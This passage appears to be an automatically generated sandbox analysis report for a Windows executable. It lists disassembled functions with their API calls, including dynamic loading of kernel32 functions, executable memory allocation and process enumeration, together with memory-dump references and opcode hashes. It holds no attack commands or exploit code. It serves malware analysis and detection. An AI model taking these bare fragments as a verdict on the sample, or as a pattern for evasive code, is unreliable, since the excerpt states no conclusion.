                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
                                          • Instruction ID: 8493e7db2d8cea0368b79c7fdac4ee95d941aeb4166f5a925bb30dde8a5d06fe
                                          • Opcode Fuzzy Hash: 6ed8df8f7e7cb5e2c59cbc1bace8d970ff02d804666620e55b54105b0843d49e
                                          • Instruction Fuzzy Hash: B0219172604218AFDF258F54CC86FEE3B69EF48724F150114FE156B1D0DB71A9919B90
                                          Function 001381B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0013826F
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0013827D
                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00138284
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          • Opcode ID: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
                                          • Instruction ID: 6356b60b09232866bf2d4fdd90c38a1e3f6c6214f49a48ded031e57fdb4eecc5
                                          • Opcode Fuzzy Hash: 53db7f8ddf6a63879c00a6a0de9f3f588b440901efbc193fe3eb915a7d568959
                                          • Instruction Fuzzy Hash: A1218EB5604209AFDB10DF58CCC5DA737EDEB5A3A4F080059FA059B2A1CB70EC51CBA0
                                          Function 001372D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00137360
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00137370
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00137395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
                                          • Instruction ID: bd81a6e112315464f240c7e0b0a4c332dada78972faefdaaeaad65faa93e6c50
                                          • Opcode Fuzzy Hash: fcaea08da3f77a9487391192199c58a10d354683807431ea7a0f0496a58b128f
                                          • Instruction Fuzzy Hash: 2C21BE72604118BFDF268F54CC85EBF3BAAEB89764F018124FA459B1E0C771AC519BA0
                                          Function 00137D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00137D97
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00137DAC
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00137DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
                                          • Instruction ID: 536288d900350e1b17be8b77c0c5477ee0c1094ae9674769cf3874b4f0e6f09e
                                          • Opcode Fuzzy Hash: 732bcfde5864a9352aad6a921ea9d3221b51d29f025244a84dfd83b5aedf9db8
                                          • Instruction Fuzzy Hash: A211E7B2244209BADF245FA4CC45FE737A9EF89754F114528FB45A60D0D7719851CB20
                                          Function 0012C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000F027A,?), ref: 0012C6E7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0012C6F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
                                          • Instruction ID: e019d709c88e63f5be7418d6a46d7a8a9ded1e024a326e3c530ed18e5c3bf3fe
                                          • Opcode Fuzzy Hash: 4c3020830cc7cc06f7ef6ff9fde7cb647cde8d1b084537c6f3f884b602cec825
                                          • Instruction Fuzzy Hash: A5E0C27C2103238FD7215B26DC48A5A76D4FF18B04B408429EA85D2620D774C8C0CF90
                                          Function 000C4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4B44,?,000C49D4,?,?,000C27AF,?,00000001), ref: 000C4B85
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C4B97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
                                          • Instruction ID: 2da751817b9cd9a68d73ba89cdc8e71afb4afc7093e4d70cba16d96321931142
                                          • Opcode Fuzzy Hash: 30fe51cbd59f48ad59e44d107cef107bf66d2fab81f79d01fc685a0b813b0fd3
                                          • Instruction Fuzzy Hash: 98D017B55207128FD7219F32DC28B0A76E4AF09755F11882ED596E2AA0E7B0E8C0DA10
                                          Function 000C4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C4AF7,?), ref: 000C4BB8
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4BCA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
                                          • Instruction ID: cfd5ef26df26cc9a9702125b34c5df70e4f3157cab87eab5527b61a6850b23ee
                                          • Opcode Fuzzy Hash: e346050e3d2b17fcdbeaaf817ed79a51463f2e454df114789fba2b28c094bda4
                                          • Instruction Fuzzy Hash: 4ED0C7B48203138FD3218F32DC08B0A72E4AF09740B008C6ED486C2AA8EBB0C8C0CA00
                                          Function 00131447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00131696), ref: 00131455
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00131467
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
                                          • Instruction ID: 000bd205dc6ad4290b72fb1664be191f950a327a9802c5138348abd2a77d0ebf
                                          • Opcode Fuzzy Hash: a4448e12548cf38011436ae9064508bf7e56a1caa938e62356314972bb94ee36
                                          • Instruction Fuzzy Hash: 92D01774510713DFD7219F76CC0861676E4AF1B795F11C82E98E6D2560EB70D8C0CA50
                                          Function 000C55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,000C5E3D), ref: 000C55FE
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C5610
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
                                          • Instruction ID: 33704cd920a25ec8e02df7dc29d46fff8d7c03af912d1f077b2b0eb58a609071
                                          • Opcode Fuzzy Hash: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
                                          • Instruction Fuzzy Hash: 26D01278520B128FE7215F32CC0861B76D4AF09756B11882DD586D2561D770D4C0CA50
                                          Function 001297CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001293DE,?,00140980), ref: 001297D8
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001297EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
                                          • Instruction ID: 9164d7e114355636c5d1df4527f1010b66cd3c7b4dca029600f82d30b984bb66
                                          • Opcode Fuzzy Hash: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
                                          • Instruction Fuzzy Hash: 63D017B45207238FD7219F36EC88606B6E4AF09791F11C82AD58AE2660EB74C8D0CA11
                                          Function 00107D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
                                          • Instruction ID: e94c3016d6cad9b81e19c04e0dc83abeb7e1e2cabec4c8796211238997bda26f
                                          • Opcode Fuzzy Hash: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
                                          • Instruction Fuzzy Hash: 63C17E74A04216EFCB14DF98C884EAEB7B5FF48714B118598F885EB291DB71ED81CB90
                                          Function 0012E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0012E7A7
                                          • CharLowerBuffW.USER32(?,?), ref: 0012E7EA
                                            • Part of subcall function 0012DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0012DEAE
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0012E9EA
                                          • _memmove.LIBCMT ref: 0012E9FD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: af302f69641ac57607560820ccb702ce59a004d6c93abb0bb7a462449c303f4c
                                          • Instruction ID: 683be9da2a3bf69c9b05b2aee75bb682e8d120d7efff6cef73416bc2e8257df0
                                          • Opcode Fuzzy Hash: af302f69641ac57607560820ccb702ce59a004d6c93abb0bb7a462449c303f4c
                                          • Instruction Fuzzy Hash: 10C17B716083118FC714DF28D480AAABBE4FF89714F14896EF8999B352D731E946CF92
                                          Function 0012877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 001287AD
                                          • CoUninitialize.OLE32 ref: 001287B8
                                            • Part of subcall function 0013DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00128A0E,?,00000000), ref: 0013DF71
                                          • VariantInit.OLEAUT32(?), ref: 001287C3
                                          • VariantClear.OLEAUT32(?), ref: 00128A94
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 19d0a26a417dc1de05d37a55c650825716a3d84d1d6ea995165287d4a1b71809
                                          • Instruction ID: 95e106feca787ba79edf994682ee6c3467a94da002d14d9f6927714192a8fd55
                                          • Opcode Fuzzy Hash: 19d0a26a417dc1de05d37a55c650825716a3d84d1d6ea995165287d4a1b71809
                                          • Instruction Fuzzy Hash: 75A158752047119FDB14EF14D481BAAB7E4BF88314F148849F9969B3A2CB30ED50CB96
                                          Function 0010814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108308
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108320
                                          • CLSIDFromProgID.OLE32(?,?,00000000,00140988,000000FF,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108345
                                          • _memcmp.LIBCMT ref: 00108366
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 9c65658d7aae294e53a592f78440743af8ca382010e70f22a4605a3030f352d7
                                          • Instruction ID: 20fa58c4cbb02046e10edd6595707e55c17c23ab4263e5b53b988eb08fcd28f3
                                          • Opcode Fuzzy Hash: 9c65658d7aae294e53a592f78440743af8ca382010e70f22a4605a3030f352d7
                                          • Instruction Fuzzy Hash: 46813975A00109EFCB04DFD4C984EEEB7B9FF89315F204558E556AB2A0DB71AE06CB60
                                          Function 0010749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: 4115971090b36a41824b35bb221463d04b8001def0260172531b0422c0d0b587
                                          • Instruction ID: 41eff9fb4b01e186ffdaf5261538e55a6ea2d949c19873126d468c251bfc6bdb
                                          • Opcode Fuzzy Hash: 4115971090b36a41824b35bb221463d04b8001def0260172531b0422c0d0b587
                                          • Instruction Fuzzy Hash: 02519630E087059AD724AF79D895A7DB3E5AF55310B20881FE5C7C76E2EBB1B8808B15
                                          Function 0012F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0012F526
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0012F534
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0012F5F4
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0012F603
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 2be7604fa4ab266b075b9dfd496ffeb4abd7e5e2e21b3eae6ee4c350abadb069
                                          • Instruction ID: 62dfc59d2ff7d7d2a17bac37d29a3fe0825dd7caf68a81d90e235dbf9ad4555c
                                          • Opcode Fuzzy Hash: 2be7604fa4ab266b075b9dfd496ffeb4abd7e5e2e21b3eae6ee4c350abadb069
                                          • Instruction Fuzzy Hash: D3514D715043119FD310EF24D886FAFB7E8EF99710F40492DF595972A2EB709A05CB92
                                          Function 000D492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                          • Instruction ID: 751c2c110ab772d291df6090b1e87a96a5d5f07b86c74e424d2849ae06327b6c
                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                          • Instruction Fuzzy Hash: 3D41B531600706ABDF688FAEC8909AFB7E5AF41360B24817FE855C7740D7709D418B65
                                          Function 0010A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0010A68A
                                          • __itow.LIBCMT ref: 0010A6BB
                                            • Part of subcall function 0010A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0010A976
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0010A724
                                          • __itow.LIBCMT ref: 0010A77B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
